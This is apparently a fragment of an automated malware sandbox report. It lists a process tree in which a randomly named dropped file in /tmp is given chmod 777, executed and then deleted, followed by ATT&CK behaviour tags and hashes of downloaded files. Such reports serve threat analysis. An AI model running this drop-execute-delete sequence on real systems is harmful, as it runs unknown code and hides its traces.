/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
16B
MD5 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1 a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471